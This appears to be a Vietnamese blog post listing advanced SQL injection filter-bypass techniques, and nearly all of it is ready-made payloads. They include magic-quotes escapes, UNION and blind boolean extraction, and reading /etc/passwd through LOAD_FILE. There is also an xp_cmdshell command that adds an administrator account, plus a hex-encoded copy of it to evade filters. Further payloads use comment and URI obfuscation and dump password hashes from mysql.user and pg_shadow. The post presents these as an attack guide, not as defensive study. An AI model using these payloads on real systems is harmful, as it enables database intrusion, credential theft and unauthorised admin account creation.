J2TEAM Security: A must-have extension for Chrome users. Install now!

Các kỹ thuật bypass SQL Injection Nâng Cao

Bypass PHP Magic Quotes

Ví dụ:


Code:
"SELECT name, surname FROM users WHERE
name='" . $_GET['name'] . "'"
Ta có thể by pass bằng back-end DBMS

Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR 10>4--'
Exploit với câu lệnh Union

Code:
SELECT name, surname FROM users WHERE
name='foobar\' UNION ALL SELECT NAME,
PASSWORD FROM SYS.USER$--'
Boolean-based blind SQL injection exploit

Code:
SELECT name, surname FROM users WHERE
name='foobar\' OR ASCII(SUBSTR((SQL
query), Nth SQL query output char, 1))
> Bisection algorithm number--'
By pass qua lênh load_file

Code:
LOAD_FILE('/etc/passwd')
biến đổi như sau

Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97,
115,115,119,100))
hoặc

Code:
LOAD_FILE(0x2f6574632f706173737764)
Trong các web asp ta có thể dùng phương pháp back-end DBMS
vd:

Code:
SELECT pg_sleep(3)
thành 

Code:
S%ELEC%T %p%g_sle%ep(%3)
Bypass bằng phương pháp hex đối với MSSQL
vd:

Code:
exec master..xp_cmdshell 'NET USER myuser
mypass /ADD & NET LOCALGROUP
Administrators myuser /ADD'
thành

Code:
DECLARE @rand varchar(8000) SET @rand =
0x65786563206d61737465722e2e78705f636d6473
68656c6c20274e45542055534552206d7975736572
206d7970617373202f4144442026204e4554204c4f
43414c47524f55502041646d696e6973747261746f
7273206d7975736572202f41444427; EXEC
(@rand)
ByPass bằng các dấu comment trong mysql
vd:

Code:
SELECT user, password FROM mysql.user
thành

Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D
*/password/*r+anD*/FROM/*rAn,D*/mysq
l.user
Bypass by random URI encoded payload 
vd: đối với hệ quản trị PostgreSQL

Code:
SELECT schemaname FROM pg_tables
thành

Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6e
a%6de%20%46%52O%4d%20%70g%5f%74a%62%
6ce%73
Bypass với các câu select đơn
vd:

Code:
SELECT user, password FROM mysql.user
thành

Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND',
password)) FROM mysql.user
hoặc sử dụng unhex(hex(trường cần lấy))

Code:
unhex(hex(username))

Bypass với các trường hợp column bị giới hạn


vd:đối với 

Code:
SELECT usename, passwd FROM pg_shadow
thành

Code:
UNION ALL SELECT,
CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR
(68)||CHR(111)||COALESCE(CAST(usename AS
CHARACTER(10000)),
CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(
121)||CHR(66)||CHR(109)||COALESCE(CAST(pas
swd AS CHARACTER(10000)),
CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR
(103)||CHR(107)||CHR(90), FROM pg_shadow--
Chúc các bạn thành công.
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!